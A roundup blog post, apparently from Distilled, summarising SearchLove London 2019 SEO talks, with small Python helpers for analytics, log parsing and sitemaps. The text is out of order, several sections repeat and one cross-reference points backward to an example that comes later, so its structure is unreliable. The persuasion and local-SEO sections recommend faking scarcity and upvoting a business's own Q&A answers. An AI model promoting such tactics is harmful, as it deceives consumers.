Actually observing our users to figure out what and how they’re searching and moving through the funnel.
You can then quantify this data by combining it with other data sources (i.e. PPC data, conversion data, etc.).
If you don’t have time to conduct surveys, then you can go to social media and ask a question!
Want more on questions you can ask your customers? Check out this resource from Sarah.
SearchLove London 2019 - Sarah Gurbach - Using Qualitative Data to Make Human-centered Decisions from Distilled
Greg Gifford - ‘Doc Brown’s Plutonium-Powered SEO Playbook’
Greg delivered an entertaining, informative and best of all highly actionable talk on local SEO. If you have physical locations for your business, you should not be neglecting your local SEO strategy! It’s important to remember that there is a different algorithm for local SEO compared to the traditional SERP, and therefore you need to approach local SEO slightly differently.
Greg’s key tips to nailing your local SEO strategy are as follows:
Links are weighted differently for local SEO! Make sure you acquire local links - quality, and whether these are follow or nofollow, matters far less than in the standard SERP. The key is to make sure your links are local - get your hands dirty with some old-school marketing and get out into your local community to build links from churches, businesses and community websites in your area.  
Content needs to actually be about your business and local area. If you can use your website copy for a site in another area, you’re doing it wrong. Also, make sure that your blog is a local destination - if your content is more localised than competitors, then you’ll be one step ahead of competitors. 
Citations are also important, but you only need a handful! Make sure you link to your website from places that customers will actually see, such as your Facebook, Twitter and other social profiles. Ensure your business information is accurate across platforms.
Reviews need to be strong across platforms - there’s no use having excellent reviews in Google My Business, and then bad reviews on TripAdvisor!
Google My Business is your new homepage, so make sure you give it some attention!
Bear in mind that users can not only ask questions but also answer them - make sure you create your own Q&A here and upvote your answers so that they appear at the top.
Also be aware that clicks from GMB are recorded as direct! If you use UTM tracking parameters, then you can update the tracking so that you can attribute it correctly to organic.
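A small helper for tagging a GMB landing-page URL might look like this (the parameter values are illustrative - use whatever scheme your analytics setup expects):

```python
from urllib.parse import urlencode, urlparse, parse_qsl, urlunparse

def tag_gmb_url(url: str) -> str:
    """Append UTM parameters so Google My Business clicks can be
    attributed to organic instead of direct in analytics."""
    utm = {"utm_source": "google", "utm_medium": "organic",
           "utm_campaign": "gmb-listing"}
    parts = urlparse(url)
    query = dict(parse_qsl(parts.query))  # keep any existing params
    query.update(utm)
    return urlunparse(parts._replace(query=urlencode(query)))

print(tag_gmb_url("https://example.com/"))
# https://example.com/?utm_source=google&utm_medium=organic&utm_campaign=gmb-listing
```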
SearchLove London 2019 - Greg Gifford - Doc Brown's Plutonium-powered Local SEO Playbook from Distilled
Luke Carthy - ‘Finding Powerful CRO and UX Opportunities Using SEO Crawlers’
Luke Carthy discussed the importance of not always striving to drive more traffic, but making the most of the traffic you currently do have. More traffic does not necessarily equal more conversions! He explored different ways to identify opportunities using crawl software and custom extraction, and to use these insights to improve conversion rates on your website.
His top recommendations include:
Look at the internal search experience of users - do they get a ‘no results found’ page? What does this look like - does it provide a good user experience? Does it guide users to alternative products?
Custom extraction is an excellent way to mine websites for information (your own and especially competitors!)
Consider scraping product recommendations:
What products are competitor sites recommending? These are often based on dynamic algorithms, so provide a good insight into what products customers buy together
Also pay attention to the price of the recommended products vs. the main product - recommended items are often more expensive, to encourage users to spend more
Also consider scraping competitor sites for prices, review and stock
Are you cheaper than competitors?
Do competitors have popular products that you don’t have? What are their best and worst-performing products? Often category or search results pages are ordered by best-sellers, and you can take advantage of this by mining this information
To deepen your analysis, plug in other data such as log file data, Google Analytics, XML sitemaps and backlinks to try to understand how you can improve your current results, and to obtain comprehensive insights that you can share with the wider team
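Once the custom extraction data is out of the crawler, the comparisons themselves are trivial - for example (all products and prices invented):

```python
# Hypothetical output of a custom extraction run:
# product slug -> price scraped from our site and a competitor's.
ours = {"ballet-flats": 34.99, "pointe-shoes": 59.00, "ribbon": 4.50}
theirs = {"ballet-flats": 29.99, "pointe-shoes": 62.00, "leg-warmers": 12.00}

# Where are we undercut, and what do they stock that we don't?
undercut = {p: (ours[p], theirs[p]) for p in ours.keys() & theirs.keys()
            if theirs[p] < ours[p]}
gaps = sorted(theirs.keys() - ours.keys())

print(undercut)  # {'ballet-flats': (34.99, 29.99)}
print(gaps)      # ['leg-warmers']
```

The same shape of comparison works for review counts and stock status.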
SearchLove London 2019 - Luke Carthy - Finding Powerful CRO and UX Opportunities Using SEO Crawlers from Distilled
Andi Jarvis - ‘The Science of Persuasion’
Human psychology affects consumers’ buying behavior tremendously. Andi covered how we as SEOs can better understand these factors to influence our SEO strategy and improve conversions.
Scarcity: you can create the impression of scarcity even when it doesn’t exist, by creating scarcity of time to drive demand. An example of this is how Hotels.com creates a sense of urgency by including things like “Only 4 rooms left!” Test and learn with different time scales (hours, days, weeks or more) to see what works best for your product offering.
Authority: building authority helps people understand who they should trust. When you’ve got authority, you are more likely to persuade people. You can build authority simply by talking about yourself, and by labelling yourself as an authority in your industry.
Likeability: The reason that influencer marketing works is due to the principle of liking: we prefer to buy from people who we are attracted to and who we aspire to be. If we can envision ourselves using a product or service by seeing ourselves in its marketing, then we are more likely to convert.
Pretty Little Thing has started doing this by featuring two different models wearing the same clothing, increasing the likelihood of users identifying with them
Purpose: People are more likely to buy when they feel they are contributing to a cause, for example, Pampers who has a partnership with Unicef, so consumers feel like they are doing a good deed when they buy Pampers products. This is known as cause-based or purpose-based marketing.
Social proofing: It’s been known for a long time that people are influenced by the behaviour of others. In the early 1800s, theatres would pay people to clap at the right moments in a show, to encourage others to join in. Similarly today, if a brand has several endorsements from celebrities or users, people are more likely to purchase their products.
Reciprocation: Offering customers a free gift (even if small) can have a positive impact on re-purchase rates. Make sure though that you evolve what you do if you have a regular purchase cycle - offer customers different gifts so that they don’t know what to expect, otherwise the positive effect wears off.
SearchLove London 2019 - Andi Jarvis - The Science of Persuasion from Distilled
Heather Physioc - ‘Building a Discoverability Powerhouse: Lessons From Integrating Organic Search, Paid Search & Performance Content’
Organic, paid content and the like all impact discoverability. Yet, in many organisations, these teams are siloed. Heather discussed tips for integrating and collaborating between teams to build a “discoverabilty powerhouse”.
There are definite obstacles to integrating marketing teams like paid, social, or organic.
Merging teams too much can actually diminish agility. Depending on what marketing needs are at different times, allow for independence of teams when it’s necessary to get a job done.
Every team has their own processes for getting things done. Don’t try to overhaul everything at once. Talk with each other to see where integration makes the most sense.
There are also clear wins when you’re able to collaborate effectively.
When you’re in harmony with each team, you can more seamlessly find opportunities for discoverability. This can ultimately lead to up-sells or cross-sells.
By working together, we can share knowledge more deeply and have richer data. We can then leverage this to capture as much of the SERP as possible.
Cross-training teams can help build empathy and trust. When separate teams gain an understanding of how and why certain tasks (i.e. keyword research) are done, it can help everyone work better together and streamline processes.
SearchLove London 2019 - Heather Physioc - Building a Discoverability Powerhouse from Distilled
Robin Lord - ‘Excel? It Would Be Easier To Go To Jupyter’
Robin, a senior consultant here at Distilled, demonstrated the various shortcomings of Excel and showed an easier, repeatable, and more effective way to get things done - using Jupyter Notebooks and Python.
Below we outline Robin’s main points:
Excel and Google Sheets are very error-prone - especially if you’re dealing with larger data sets! If you need to process a lot of data, then you should consider using Jupyter Notebooks, as it can handle much bigger data sets (think: analysing backlinks, doing keyword research, log file analysis)
Jupyter Notebooks are reusable: if you create a Jupyter script to do any repeatable task (i.e. reporting or keyword research) then you can reuse it. This makes your life much easier because you don’t have to go back and dissect an old process.
Jupyter allows you to use Regex. This gives a huge advantage over Excel because it is far more efficient at allowing you to account for misspellings. This, for example, gives you a far better chance of accurately capturing things like branded search query permutations.
Jupyter allows you to write notes and keep every step in your process ordered. This means that your methodology is noted and the next time you perform this task, you remember exactly the steps you took. This is especially useful for when clients ask you questions about your work weeks or months down the line!
Finally - Jupyter notebooks allow us to get answers that we can’t get from Excel. We’re able to not only consider the data set from new angles, but we also have more time to go about other tasks, such as thinking about client strategy or improving other processes.
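For example, a single pattern can sweep up branded permutations that exact-match spreadsheet filters would miss (reusing the John Lewis example from earlier; the misspellings are invented):

```python
import re

# One pattern catches the brand plus common misspellings and spacings.
BRAND = re.compile(r"\bjohn\s*lew[ei]s+\b")

queries = ["john lewis sofas", "johnlewis login",
           "john lewes opening hours", "sofa beds uk"]
branded = [q for q in queries if BRAND.search(q)]
print(branded)  # ['john lewis sofas', 'johnlewis login', 'john lewes opening hours']
```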
Robin has so many slides it breaks Slideshare. Instead, you can download his slides from Dropbox.
Jes Scholz - ‘Giving Robots An All Access Pass’
Jes Scholz uses the analogy of a nightclub to explain how Googlebot interacts with your website. The goal? To become part of the exclusive “Club Valid”. Her main points are outlined below:
As stated by John Mueller himself, “crawl budget is overrated - most sites never need to worry about this”. So instead of focusing on how much Google is crawling your site, you should be most concerned with how Google is crawling it
Status codes are not good or bad - there are right codes and wrong codes for different situations
In a similar vein, duplicate content is not “bad”, in fact, it’s entirely natural. You just need to make sure that you’re handling it correctly
JavaScript is your ticket to better UX, however, bear in mind that this often presents a host of SEO difficulties. Make sure that you don’t rely on the mobile friendly testing tool to see if Google is able to crawl your JavaScript - this tool actually uses different software to Googlebot (this is a common misconception!) The URL inspection tool is a bit better for checking this, however, bear in mind it’s more patient that Googlebot when it comes to rendering JavaScript, so isn’t 100% accurate.
SearchLove London 2019 - Jes Scholtz - Giving Robots an All Access Pass from Distilled
Rand Fishkin - ‘The Search Landscape in 2019’
As the web evolves, it’s important to evaluate the areas you could invest in carefully. Rand explored the key changes affecting search marketers and how SEOs can take these changes into account when determining strategy.
Should you invest in voice search? It’s probably a bit too early. There is little difference in the results you get from a voice search vs. a manual search.
Both mobile and desktop are big - don’t neglect one at the expense of the other!
The zero-click search is where the biggest search growth is happening right now. It now accounts for about half (48.96% in the US) of all searches!
If you could benefit from answering zero-click searches, then you should prepare for that. You can determine whether you’d benefit by evaluating the value in ranking for a particular query without necessarily getting traffic.
With changes in Google search appearance recently, ads have become more seamless in the SERP. This has led to paid click-through-rate rising a lot. However, if history is correct, then it will probably slowly decline until the next big search change.
As Google’s algorithms evolve, you’ll likely receive huge ranking benefits from focusing on growing authority signals (E-A-T).
Check out Rand’s slides to see where you should be spending your time and money as the search landscape evolves.
SearchLove London 2019 - Rand Fishkin - The Search Landscape in 2019 from Distilled
Emily Potter - ‘Can Anything in SEO Be Proven? A Deep-Dive Into SEO Split-Testing’
Split testing SEO changes allow us to say with confidence whether or not a specific change hurts or helps organic traffic. Emily discusses various SEO split tests she’s run and potential reasons for their outcome.
The main levers for SEO tend to boil down to
1. Improving organic click-through-rate (CTR)
2. Improving organic rankings of current keywords
3. Ranking for new keywords
Split testing changes that we want to make to our site can help us to make business cases, rescue sessions, and gain a competitive advantage.
Determining which of the three levers causes a particular test to be positive or negative is challenging because they all impact each other, making the data noisy. Measuring organic sessions relieves us of this noise.
Following “best practices” or what your competitors are doing is not always going to result in wins. Testing shows you what actually works for your site. For example, adding quantity of products in your titles or structured data for breadcrumbs might actually negatively impact your SEO, even if it seems like everyone else is doing so.
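As a rough illustration of the measurement idea (all session numbers invented for the example), a difference-in-means on organic sessions between variant and control page groups might be sketched like this - note that real SEO split-testing platforms use forecast-based counterfactuals rather than a simple comparison:

```python
from statistics import mean

# Hypothetical daily organic sessions for the control and variant page
# groups during a test period (invented numbers, not real test data)
control = [1040, 980, 1015, 1002, 995, 1030, 988]
variant = [1110, 1065, 1098, 1120, 1072, 1101, 1089]

# Simple difference-in-means uplift on organic sessions
uplift = (mean(variant) - mean(control)) / mean(control)
print(f"Observed uplift in organic sessions: {uplift:.1%}")
```

Measuring sessions rather than rankings or CTR, as above, sidesteps the question of which lever moved - you only see the combined effect.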
Check out Emily’s slides to see more split test case studies and learnings!
Lessons from another year in SEO A/B Testing - SearchLove London 2019 from Emily Potter
Jill Quick - ‘Segments: How To Get Juicy Insights & Avoid The Pips!’
In her excellent talk, Jill highlights how “average data gives you average insights”, and discusses the importance of segmenting your data to gain deeper insights into user behaviour. While analytics and segments are awesome, don’t become overwhelmed with the possibilities - focus on your strategy and work from there.
Jill’s other tips include:
Adding custom dimensions to forms on your website allows you to create more relevant and specific data segments
For example, if you have a website in the education sector, you can add custom dimensions to a form that asks people to fill in their profession.  You can then create a segment where custom dimension = headteacher, and you can then analyse the behaviour of this specific group of people
Build segments that look at your best buyers (people who convert well) as well as your worst customers (those who spend barely any time on site and never convert). You can learn a lot about your ideal customer, as well as what you need to improve on your site, by doing this.
Use your segments to build retargeting lists - this will usually result in lower CPAs for paid search, helping your PPC budget go further
Don’t forget to use advanced segments (using sequences and conditions) to create granular segments that matter to your business
You can use segments in Google Data Studio, which is awesome! Just bear in mind that in Data Studio you can’t see if your segment data is sampled, so it’s best to go into the GA interface to check
If you want to hear more about Jill's session, she's written a post to supplement her slides.
Segments in Google Analytics from The Coloring In Department
Rory Truesdale - ‘Using The SERPs to Know Your Audience’
It can be easy to get lost in evaluating metrics like monthly search volume, but we often forget that for each query, there is a person with a very specific motivation and need. Rory discussed how we can utilise Google’s algorithmic re-writing of the SERP to help identify those motivations and more effectively optimise for search intent - the SERPs give us amazing insight into what customers want!
Google rewrites the SERP displayed meta description 84% of the time (it thinks it’s smarter than us!) However, we can use this rewrite data to our advantage.
The best ways to get SERP data are through crawling SERPs in Screaming Frog, the scraper API or Chrome extension, or “Thruuu” (a SERP analysis tool), and then using Jupyter Notebooks to analyse the results.
Scraping of SERPs, product reviews, comments, or Reddit forums can be really powerful in that it will give you a data source that can reveal insight about what your customers want. Then you can optimise the content on your pages to appeal to them.
If you can get a better idea about what language and tone resonates with users, you can incorporate it into CTAs and content.
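As a toy illustration of mining scraped SERP copy (the descriptions below are invented for the example), counting recurring bigrams across meta descriptions can surface the language that resonates for a query:

```python
from collections import Counter
import re

# Hypothetical meta descriptions scraped from a SERP (illustrative only)
descriptions = [
    "Shop the best ballet shoes for beginners, with free returns.",
    "Find the best ballet shoes for wide feet - expert buying guide.",
    "Best ballet shoes 2019: our experts review the top brands.",
]

def bigrams(text):
    # Tokenise to lowercase words, then pair each word with its successor
    words = re.findall(r"[a-z']+", text.lower())
    return zip(words, words[1:])

counts = Counter(b for d in descriptions for b in bigrams(d))
print(counts.most_common(3))
```

The same counting approach works on scraped reviews or forum threads - anywhere customers describe the product in their own words.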
Check out Rory’s slides as well as the Jupyter notebook he uses to analyse SERP data.
SearchLove London 2019 - Rory Truesdale - Using the SERPs to Know Your Audience from Distilled
Miracle Inameti Archibong - ‘The Complete Guide To Actionable Speed Audits: Getting Your Developer To Work With You’
It can be a huge challenge to get devs to implement our wishlist of SEO recommendations. Miracle discussed the practical steps to getting developers to take your recommendations seriously.
If you take some time to understand the Web Dev roles at your company, then it will help you better communicate your needs as an SEO and get things rolled out. You can do this by:
Learning the language that they’re using. Do some research into the terminology as well as possible limitations of your ask. This will make you more credible and you’re more likely to be taken seriously.
A team of developers may have different KPIs than you. It may be beneficial to use something like revenue as a way to get them on board with the change you want to make.
Try to make every ask more collaborative rather than instructive. For example, instead of simply presenting “insert this code,” try “here’s some example code, maybe we can incorporate x elements. What do you think?” A conversation may be the difference in effecting change.
Prioritising your requests in an easily readable way for web dev teams is always a good idea. It will give them the most information on what needs to get done in what timeline.
SearchLove London 2019 - Miracle Inameti-Archibong - The Complete Guide to Actionable Speed Audits from Distilled
Faisal Anderson - ‘Spying On Google: Using Log File Analysis To Reveal Invaluable SEO Insights’
Log files contain hugely valuable insight on how Googlebot and other crawlers behave on your site. Faisal uncovered why you should be looking at your logs as well as how to analyse them effectively to reveal big wins that you may have otherwise been unable to quantify.
Looking at log files is a great way to see the truest and freshest data on how Google is crawling your site. It’s most accurate because it’s the actual logs of how Google (and any other bot) is crawling your website.
Getting log file data can be tricky, so it’s helpful to ask devs about your hosting setup (if your server uses load balancing, the log files may be split between various hosts). You’ll want to get 6 months of data if you can.
The three main things to evaluate when you’re analysing log files:
Crawl behavior: look at most and least crawled URLs, look at crawl frequency by depth and internal links
Budget waste: find low-value URLs (faceted nav, query params, etc.); there are likely some subdirectories you want crawled more than others
Site health: look for inconsistent server responses
Using Jupyter to do log file analysis is great because it’s reusable and you’ll be able to use it again and again.
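To make that concrete, here is a minimal sketch of the kind of parsing such a notebook would do - counting Googlebot requests and response codes from Apache combined-format log lines (the lines below are fabricated for illustration):

```python
import re
from collections import Counter

# Sample access-log lines in Apache combined format (fabricated for illustration)
log_lines = [
    '66.249.66.1 - - [14/Oct/2019:10:12:01 +0000] "GET /category/shoes HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '66.249.66.1 - - [14/Oct/2019:10:12:05 +0000] "GET /old-page HTTP/1.1" 404 512 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '81.2.69.142 - - [14/Oct/2019:10:12:09 +0000] "GET /category/shoes HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

# Pull out the requested URL, status code, and user agent from each line
pattern = re.compile(
    r'"(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3}).*"(?P<ua>[^"]*)"$'
)

crawled = Counter()   # how often Googlebot requested each URL
statuses = Counter()  # response codes served to Googlebot
for line in log_lines:
    m = pattern.search(line)
    if m and "Googlebot" in m.group("ua"):
        crawled[m.group("url")] += 1
        statuses[m.group("status")] += 1

print(crawled)
print(statuses)
```

In a real analysis you would also verify Googlebot by reverse DNS, since the user-agent string is easily spoofed.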
SearchLoveLondon 2019 - Faisal Anderson - Spying on Google: Using Log File Analysis to Reveal Invaluable SEO Insights from Distilled
Dr Pete Myers - ‘Scaling Keyword Research: More Isn’t Better’
Dr Pete Myers discussed how more is not better when it comes to keyword research! Ditch the thousands of keywords and instead focus on a smaller set of keywords that actually matter for you or your clients. Below are his top tips:
Pete has developed a simple metric called RankVol to help determine the importance of a keyword
RankVol = 1 / (rank x square root of volume)
Using this metric is better than sorting by search volume, as often the highest volume keywords that a site is appearing for are not the most relevant
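A quick sketch of the metric in Python (the keyword rows are invented for illustration, not Dr Pete's data):

```python
from math import sqrt

# Hypothetical (keyword, rank, monthly volume) rows for a site
keywords = [
    ("john lewis", 1, 1_500_000),          # huge-volume brand head term
    ("mens leather gloves", 4, 8_100),
    ("john lewi", 2, 12_000),              # misspelling noise
    ("personalised photo albums", 3, 2_900),
]

def rankvol(rank, volume):
    # RankVol = 1 / (rank * sqrt(volume)), as defined in the talk
    return 1 / (rank * sqrt(volume))

ranked = sorted(keywords, key=lambda k: rankvol(k[1], k[2]), reverse=True)
for kw, rank, vol in ranked:
    print(f"{kw}: {rankvol(rank, vol):.6f}")
```

Note how the metric surfaces well-ranking, moderate-volume terms over the huge-volume brand head term - though the misspelling also scores highly, which is exactly why the noise-stripping step below matters.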
Lots of data in keyword research can be irrelevant. Using John Lewis as an example:
9% of keywords John Lewis ranks for are mis-spellings
Almost 20% of keywords they rank for are very close variants (plural vs. singular, for example)
Dr Pete provides a short script in his deck to group keywords to help strip out noise in your data set
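Dr Pete's actual script is in his deck; as a hypothetical stand-in, grouping close variants by normalising case and plurals might look like this:

```python
from collections import defaultdict

# Hypothetical ranking keywords containing close variants
keywords = ["photo album", "photo albums", "Photo Album", "photo albums uk"]

def normalise(kw):
    # Crude stand-in for real grouping logic: lowercase, then strip a
    # trailing "s" from each token to fold singular/plural variants together
    tokens = [t.rstrip("s") or t for t in kw.lower().split()]
    return " ".join(tokens)

groups = defaultdict(list)
for kw in keywords:
    groups[normalise(kw)].append(kw)

print(dict(groups))
```

A production version would also need fuzzy matching for misspellings; this sketch only folds case and plural noise.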
If sitelinks appear for your website, Google thinks you’re a brand
A new SERP feature (‘best of’ carousel) is appearing in the US, and will likely be rolled out into Europe soon
This feature takes you to a heavily paid SERP, with lots of ads (some well-disguised!)
If a keyword has a heavily paid SERP, you should probably not bother trying to rank for it, as the pay-off will be small
‘People also ask’ is on 90% of searches - be sure to try and take advantage of this SERP space
To summarise, perception is everything with keyword research - make sure you filter out the noise!
SearchLove London 2019 - Dr. Pete Meyers - Scaling Keyword Research: More Isn't Better from Distilled
Lindsay Wassell - ‘Managing Multinational & Multilingual SEO in Motion’
Lindsay covered the many challenges involved in handling migrations involving multiple international site variants. Her key points are highlighted below:
Ask your dev team to make sure it’s possible to implement hreflang via XML sitemaps or on-page; then if there are problems implementing one method, you have another as a fall-back option
When deciding site structure and where international sites should be located (sub-folder? Subdomain? ccTLD?) bear in mind that there is no one-size-fits-all solution. It may be best to have a mixture of solutions, depending on each market.
If you have hreflang relationship issues, Lindsay advises to use Google Sheets to manage hreflang mappings, in combination with a script that can automatically generate XML sitemaps (link provided in her deck)
In order to encourage more people in your organisation to understand the importance of SEO and to make it a priority, highlight statistics such as traffic levels and revenue coming from organic search
Also keep in mind that every department has a wish list when it comes to a migration! Be tactical and tack onto other people’s wishlists to get SEO items implemented
As a final tip - check redirects before going live, as often dev teams will say it’s under control, and then there can be problems at the last minute
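As a sketch of the sheet-to-sitemap idea from the hreflang tip above (locales and URLs invented for the example; Lindsay's own generator script is linked in her deck), producing hreflang annotations with Python's standard library might look like this:

```python
import xml.etree.ElementTree as ET

# Hypothetical hreflang mapping for one page across two markets, as might
# be pulled from a Google Sheet (URLs and locales invented for illustration)
groups = [
    {"en-gb": "https://example.com/uk/", "de-de": "https://example.com/de/"},
]

SM = "http://www.sitemaps.org/schemas/sitemap/0.9"
XHTML = "http://www.w3.org/1999/xhtml"
ET.register_namespace("", SM)
ET.register_namespace("xhtml", XHTML)

urlset = ET.Element(f"{{{SM}}}urlset")
for group in groups:
    for locale, url in group.items():
        url_el = ET.SubElement(urlset, f"{{{SM}}}url")
        ET.SubElement(url_el, f"{{{SM}}}loc").text = url
        # Every variant must annotate every member of its group, itself included
        for alt_locale, alt_url in group.items():
            ET.SubElement(url_el, f"{{{XHTML}}}link", {
                "rel": "alternate", "hreflang": alt_locale, "href": alt_url,
            })

xml_out = ET.tostring(urlset, encoding="unicode")
print(xml_out)
```

Generating the file from the sheet, rather than hand-editing XML, makes it far easier to keep the reciprocal hreflang relationships consistent.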
SearchLove London 2019 - Lindsay Wassell - Managing Multinational & Multilingual SEO in Motion from Distilled
Stacey MacNaught - ‘Actioning Search Intent - What To Do With All That Data’
By analysing search intent, you can gain a ton of really insightful data. Stacey discussed how you can utilise all of this data to optimise your site for organic search and ultimately increase revenue and traffic.
Traditionally, search intent is categorised broadly as navigational, informational, and transactional. However, it’s often unclear where things are categorised because sometimes keywords are really ambiguous. Often you can break these categories down into more specific categories.
In terms of targeting keywords on your site, look out for opportunities where you may not be delivering the right content based on what query you’re targeting.
For example, if you’re targeting an informational keyword with a transactional result, you’re not going to rank. This can be an opportunity for you to create the kind of page that will rank for a select query. If the phrase is “best ballet shoes” and the results are informational pages, then you shouldn’t be serving a transactional result.
If you can be objective about the topic at hand and you have someone qualified to write that content, then you should definitely do it.
If your rankings drop but revenue is unaffected, it’s likely you’ve lost rankings on informational keywords
Don’t assume that users will come back of their own accord - work with PPC and get them to retarget to users who have read your content
Build out different audience lists according to the types of content or topics that users have been reading
Build out separate PPC campaigns for this so you can easily monitor results
Stacey saw CPA fall by 34% when she did this for a healthcare site
To generate content ideas, talk to the sales and customer service teams to find out what users are asking, then build content around it
You can also use Google Forms to survey previous customers to find out what drove their purchase
SearchLove London 2019 - Stacey MacNaught - Actioning Search Intent: What to Do with All That Data from Distilled
Will Critchlow - ‘Misunderstood Concepts at the Heart of SEO - Get An Edge By Understanding These Areas’
Most things in SEO can be boiled down to technical accessibility, relevance, quality, and authority. Or: can it be crawled, does it meet a keyword need, and is it trustworthy? However, some of the foundational elements of SEO are misunderstood.
Regarding crawlability, it’s important to understand how setting directives in robots.txt will impact your site if handled incorrectly.
Robots.txt directives do not cascade. For example, if you set a specific directive to disallow Googlebot from /example, that is the one it will follow. Even if you specify that * (all user agents) are disallowed from /dont-crawl elsewhere in the file, Googlebot will only follow it’s set directive not to crawl /example and still be able to crawl /dont-crawl.
The Google documentation, the robots.txt checker in GSC, and the open-source parser tend to disagree on what is allowed and disallowed. So, you’ll need to do some testing to ensure that the directives you’re setting are what you intended.
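The non-cascading behaviour is easy to demonstrate with Python's built-in parser (the robots.txt below is invented for the example; real-world parsers can still disagree in edge cases, so test against your actual tooling):

```python
from urllib.robotparser import RobotFileParser

# Illustrative robots.txt: a Googlebot-specific group and a wildcard group
robots_txt = """\
User-agent: Googlebot
Disallow: /example

User-agent: *
Disallow: /dont-crawl
"""

rp = RobotFileParser()
rp.parse(robots_txt.splitlines())

# Googlebot matches its own group only, so the wildcard rule does not apply to it
print(rp.can_fetch("Googlebot", "https://example.com/example"))     # blocked
print(rp.can_fetch("Googlebot", "https://example.com/dont-crawl"))  # allowed
print(rp.can_fetch("OtherBot", "https://example.com/dont-crawl"))   # blocked
```

This is the trap in practice: adding a rule under `User-agent: *` does nothing for Googlebot once a Googlebot-specific group exists.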
We often have a lot of intuition about how things like PageRank work, but too many of our recommendations are based on misconceptions about how authority flows.
There are some huge changes coming to major browser cookie handling. The cookie window will be shorter, which means that a lot of traffic that’s currently classified as organic will be classified as direct. Understanding the language around the changes that are happening is, and will be, important
There are common misconceptions too about the meaning of ‘long tail keywords’
50% of Twitter respondents incorrectly think it means that there are many words in a query
40% understand the correct meaning, which is that they are keywords with low search volume
SearchLove London 2019 - Will Critchlow - Misunderstood Concepts at the Heart of SEO from Distilled
That's it for our London conference for another year. But the good news is we are heading to San Diego in March where we'll be getting some sun, sea and search at SearchLove San Diego!
If you have any questions about our conferences please leave a comment below or come and say hello over on Twitter.
SearchLove London 2019: The Great Big Round Up
On 14th and 15th October, we made our annual visit to The Brewery in London for our UK edition of SearchLove. This year’s conference was our most successful yet, not only in terms of the number of folks attending but also with regard to the high calibre of speakers who joined us over the jam-packed two days to share their invaluable industry insights. 
Let the show begin! #searchlove #seo pic.twitter.com/zDIRbbX2KG
— Udo Leinhäuser (@u_leinhaeuser) October 14, 2019
This post is a quick-fire summary of the knowledge our speakers had to share, plus their slides & a few photos from across the conference. All sessions in their entirety will be available with a DistilledU membership in a couple of weeks' time. And don’t forget that if you feel you missed out this year, make sure you sign up to our mailing list to be the first in the know for next year’s conference! Are you ready? Let’s get started!
Marie Haynes - ‘Practical Tips For Improving E-A-T’
Google’s algorithms are increasingly considering E-A-T components (expertise, authority and trust) when evaluating sites. Marie shared why and how to improve E-A-T so that you have the best chance at winning in the current and future search landscape.
One of the most important things to focus on is the accuracy of the information on your site. This is especially important if your pages are primarily YMYL (‘your money or your life’, in other words, content that can affect someone’s health, safety, financial stability, etc.).
Google’s quality raters use the quality raters guidelines as their textbook. If you take a look at the guidelines, you can get a better idea about what Google is actually looking at when they’re evaluating E-A-T components. Try doing a CTRL+F for your industry to see what they suggest for your vertical.
There are some practical things you can do on your site to help Google understand that you’re trustworthy and authoritative:
Have contact information available.
If you’re eCommerce, ensure that your refund policy and customer service information is clearly accessible.
Make sure your site is secure (HTTPS)
Have correct grammar. How your page reads is important!
Make sure that the information on your site doesn’t contradict any known facts, something called scientific consensus. Cite all sources as necessary.
SearchLove London 2019 - Marie Haynes - Practical Tips for Improving E-A-T from Distilled
Sarah Gurbach - ‘Using Qualitative Data To Make Human-Centered Decisions’
SEOs have a huge amount of data to work with, but often, the data that gets overlooked is that which comes directly from the humans who are driving all of our data points.
By performing qualitative research in tandem with quantitative, we can get insights on the actual human wants, barriers, and confusions that drive our customers to make their decisions and move through the funnel.
Sarah’s steps to conducting qualitative research include:
Defining your objective. Write it as a question. Keep it specific, focused and simple.
Asking open-ended questions to customers to define the personas you should be targeting. Sarah recommends surveys of 10 questions to 5 customers that should only take around 20 minutes each. More than this will likely be redundant.
Actually observing our users to figure out what and how they’re searching and moving through the funnel.
You can then quantify this data by combining it with other data sources (i.e. PPC data, conversion data, etc.).
If you don’t have time to conduct surveys, then you can go to social media and ask a question!
Want more on questions you can ask your customers? Check out this resource from Sarah.
SearchLove London 2019 - Sarah Gurbach - Using Qualitative Data to Make Human-centered Decisions from Distilled
Greg Gifford - ‘Doc Brown’s Plutonium-Powered SEO Playbook’
Greg delivered an entertaining, informative and best of all highly actionable talk on local SEO. If you have physical locations for your business, you should not be neglecting your local SEO strategy! It’s important to remember that there is a different algorithm for local SEO compared to the traditional SERP, and therefore you need to approach local SEO slightly differently.
Greg’s key tips to nailing your local SEO strategy are as follows:
Links are weighted differently for local SEO! Make sure you acquire local links - quality, and whether these are follow or nofollow, matters far less than in the standard SERP. The key is to make sure your links are local - get your hands dirty with some old-school marketing and get out into your local community to build links from churches, businesses and community websites in your area.  
Content needs to actually be about your business and local area. If you can use your website copy for a site in another area, you’re doing it wrong. Also, make sure that your blog is a local destination - if your content is more localised than competitors, then you’ll be one step ahead of competitors. 
Citations are also important, but you only need a handful! Make sure you link to your website from places that customers will actually see, such as your Facebook, Twitter and other social profiles. Ensure your business information is accurate across platforms.
Reviews need to be strong across platforms - there’s no use having excellent reviews in Google My Business, and then bad reviews on TripAdvisor!
Google My Business is your new homepage, so make sure you give it some attention!
Bear in mind that users can not only ask questions but also answer them - make sure you create your own Q&A here and upvote your answers so that they appear at the top.
Also be aware that clicks from GMB are recorded as direct! If you use UTM tracking parameters, then you can update the tracking so that you can attribute it correctly to organic.
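A small helper for tagging the GMB website link might look like this (the parameter values are illustrative - use whatever naming convention your reporting relies on):

```python
from urllib.parse import urlencode, urlsplit, urlunsplit

def add_utm(url, source, medium, campaign):
    """Append UTM parameters so GMB clicks attribute correctly, not as direct."""
    scheme, netloc, path, query, fragment = urlsplit(url)
    params = urlencode({
        "utm_source": source,
        "utm_medium": medium,
        "utm_campaign": campaign,
    })
    query = f"{query}&{params}" if query else params
    return urlunsplit((scheme, netloc, path, query, fragment))

# Hypothetical GMB website URL and tagging scheme
print(add_utm("https://example.com/", "google", "organic", "gmb-listing"))
```

The tagged URL then goes in the GMB "Website" field, so listing clicks show up under the chosen source/medium in your analytics.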
SearchLove London 2019 - Greg Gifford - Doc Brown's Plutonium-powered Local SEO Playbook from Distilled
Luke Carthy - ‘Finding Powerful CRO and UX Opportunities Using SEO Crawlers’
